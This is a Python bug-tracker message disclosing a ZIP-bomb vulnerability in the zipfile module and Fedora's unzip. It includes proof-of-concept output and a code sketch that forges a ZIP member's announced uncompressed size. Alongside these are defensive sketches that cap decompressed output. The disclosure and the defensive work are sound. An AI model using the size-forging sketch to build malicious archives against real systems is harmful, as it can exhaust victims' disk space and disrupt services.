Author vstinner
Recipients vstinner
Date 2020-01-15.09:57:16
Message-id <1579082238.3.0.125873650379.issue39341@roundup.psfhosted.org>
Content
Laish, Amit (GE Digital) reported a vulnerability in the zipfile module to the PSRT list. The module is vulnerable to ZIP bombs:
https://en.wikipedia.org/wiki/Zip_bomb

A 100 KB malicious ZIP file announces an uncompressed size of 1 byte, but extracting it writes 100 MB to disk.

Python 2.7 is vulnerable.

Python 3.7 does not seem to be directly vulnerable. The proof of concept fails with:

$ python3 poc.py 
The size of the uncompressed data is: 1 bytes
Traceback (most recent call last):
  File "poc.py", line 18, in <module>
    extract() # The uncompressed size is more than 20GB :)
  File "poc.py", line 6, in extract
    zip_ref.extractall('./')
  File "/usr/lib64/python3.7/zipfile.py", line 1636, in extractall
    self._extract_member(zipinfo, path, pwd)
  File "/usr/lib64/python3.7/zipfile.py", line 1691, in _extract_member
    shutil.copyfileobj(source, target)
  File "/usr/lib64/python3.7/shutil.py", line 79, in copyfileobj
    buf = fsrc.read(length)
  File "/usr/lib64/python3.7/zipfile.py", line 930, in read
    data = self._read1(n)
  File "/usr/lib64/python3.7/zipfile.py", line 1020, in _read1
    self._update_crc(data)
  File "/usr/lib64/python3.7/zipfile.py", line 948, in _update_crc
    raise BadZipFile("Bad CRC-32 for file %r" % self.name)
zipfile.BadZipFile: Bad CRC-32 for file 'dummy1.txt'

The malicious ZIP file is 100 KB in size. Extracting it writes dummy1.txt, a 100 MB file consisting solely of the character "0" (zero, Unicode character U+0030, byte 0x30).

The original proof of concept used a 20 MB ZIP that writes 20 GB to disk. It simply contains the same text file repeated 200 times. I created a smaller ZIP just to be able to upload it to bugs.python.org.

Attached files:

* create_zip.py: creates malicious.zip from valid.zip by modifying the announced uncompressed size of the compressed dummy1.txt
* valid.zip: compressed dummy1.txt, file size is 100 KB
* poc.py: extract malicious.zip
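
For illustration, here is a minimal sketch of how such a size mismatch could be produced. It is not the attached create_zip.py: the helper names build_zip() and forge_uncompressed_size() are hypothetical, and the sketch assumes a single-member archive with no ZIP64 records and no archive comment, so that the end-of-central-directory record is exactly the last 22 bytes.

```python
import io
import struct
import zipfile


def build_zip(payload: bytes, name: str = "dummy1.txt") -> bytes:
    """Build a valid single-member deflated ZIP archive in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


def forge_uncompressed_size(archive: bytes, fake_size: int) -> bytes:
    """Overwrite the announced uncompressed size; compressed data is untouched.

    Assumption: one member at offset 0, no ZIP64, no archive comment.
    """
    out = bytearray(archive)

    # End-of-central-directory record: the last 22 bytes when there is no
    # comment; the central directory offset is stored at byte 16 of it.
    eocd = len(out) - 22
    if out[eocd:eocd + 4] != b"PK\x05\x06":
        raise ValueError("unexpected archive layout (comment or ZIP64?)")
    (central,) = struct.unpack_from("<I", out, eocd + 16)

    if out[0:4] != b"PK\x03\x04" or out[central:central + 4] != b"PK\x01\x02":
        raise ValueError("unexpected archive layout")

    # Uncompressed size: offset 22 in the local file header,
    # offset 24 in the central directory header (little-endian uint32).
    struct.pack_into("<I", out, 0 + 22, fake_size)
    struct.pack_into("<I", out, central + 24, fake_size)
    return bytes(out)
```

zipfile takes the announced size from the central directory, so ZipInfo.file_size reports the forged value for an archive patched this way.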

--

The zipfile documentation describes "Decompression pitfalls":
https://docs.python.org/dev/library/zipfile.html#decompression-pitfalls
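
One defensive pattern, sketched here under assumptions, is to count the bytes actually produced while reading a member rather than trusting the announced size. read_member_capped() and its parameters are hypothetical names, not part of the zipfile API; only ZipFile.open() and the file object's read() are real calls.

```python
import zipfile


def read_member_capped(zf: zipfile.ZipFile, name: str, max_bytes: int,
                       chunk_size: int = 64 * 1024) -> bytes:
    """Read one member, refusing to produce more than max_bytes of output."""
    total = 0
    chunks = []
    with zf.open(name) as src:
        while True:
            chunk = src.read(chunk_size)
            if not chunk:
                break
            total += len(chunk)
            if total > max_bytes:
                # Stop as soon as the budget is exceeded, whatever the
                # header claimed about the uncompressed size.
                raise ValueError(
                    "member %r exceeds %d bytes" % (name, max_bytes))
            chunks.append(chunk)
    return b"".join(chunks)
```

The cap applies to decompressed output, so at most roughly one extra chunk is held in memory before the error is raised.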

The zlib.Decompress.decompress() method has a max_length parameter:
https://docs.python.org/dev/library/zlib.html#zlib.Decompress.decompress
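
A minimal sketch of how max_length can bound the output of a decompression object created with zlib.decompressobj(). The function name bounded_decompress() and the limit parameter are hypothetical and chosen for illustration only.

```python
import zlib


def bounded_decompress(data: bytes, limit: int) -> bytes:
    """Decompress a zlib stream, raising if the output exceeds limit bytes."""
    if limit < 0:
        raise ValueError("limit must be non-negative")
    d = zlib.decompressobj()
    # Ask for at most limit + 1 bytes: getting that many proves the stream
    # is larger than allowed. (max_length=0 would mean "no limit", which is
    # why limit + 1 is always at least 1 here.)
    out = d.decompress(data, limit + 1)
    if len(out) > limit or d.unconsumed_tail:
        raise ValueError("decompressed data exceeds %d bytes" % limit)
    return out
```

Input that was not processed because the output limit was reached is kept in the object's unconsumed_tail attribute, so the check never has to inflate the whole stream.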

See also my notes on "Archives and Zip Bomb":
https://python-security.readthedocs.io/security.html#archives-and-zip-bomb

--

The unzip program from the Fedora unzip-6.0-44.fc31.x86_64 package has the same vulnerability:

$ unzip malicious.zip 
Archive:  malicious.zip
  inflating: dummy1.txt 

$ unzip -l malicious.zip 
Archive:  malicious.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        1  03-12-2019 14:10   dummy1.txt
---------                     -------
        1                     1 file

--

According to Riccardo Schirone (Red Hat), p7zip, on the other hand, seems to use the minimum of the size announced in the header and the size of the actual data, so it extracts only 1 byte and correctly complains about CRC failures.
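
The behaviour described above can be approximated in Python as follows. This is only a sketch of the idea, not p7zip's code: extract_up_to_announced() is a hypothetical helper that takes a raw deflate stream (the form used for deflated ZIP members), the announced size, and the expected CRC-32.

```python
import zlib


def extract_up_to_announced(raw_deflate: bytes, announced_size: int,
                            expected_crc: int):
    """Return (data, crc_ok), producing at most announced_size bytes."""
    if announced_size <= 0:
        # max_length=0 means "unlimited" for decompress(), so handle the
        # empty case explicitly instead of passing 0 through.
        data = b""
    else:
        # Negative wbits selects a raw deflate stream without zlib header.
        d = zlib.decompressobj(-zlib.MAX_WBITS)
        data = d.decompress(raw_deflate, announced_size)
    crc_ok = (zlib.crc32(data) & 0xFFFFFFFF) == expected_crc
    return data, crc_ok
```

With a forged announced size of 1, only one byte is produced, and the CRC-32 computed over it does not match the CRC-32 of the real content, so the mismatch is reported without ever inflating the full payload.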
History
Date                 User      Action  Args
2020-01-15 09:57:18  vstinner  set     recipients: + vstinner
2020-01-15 09:57:18  vstinner  set     messageid: <1579082238.3.0.125873650379.issue39341@roundup.psfhosted.org>
2020-01-15 09:57:18  vstinner  link    issue39341 messages
2020-01-15 09:57:16  vstinner  create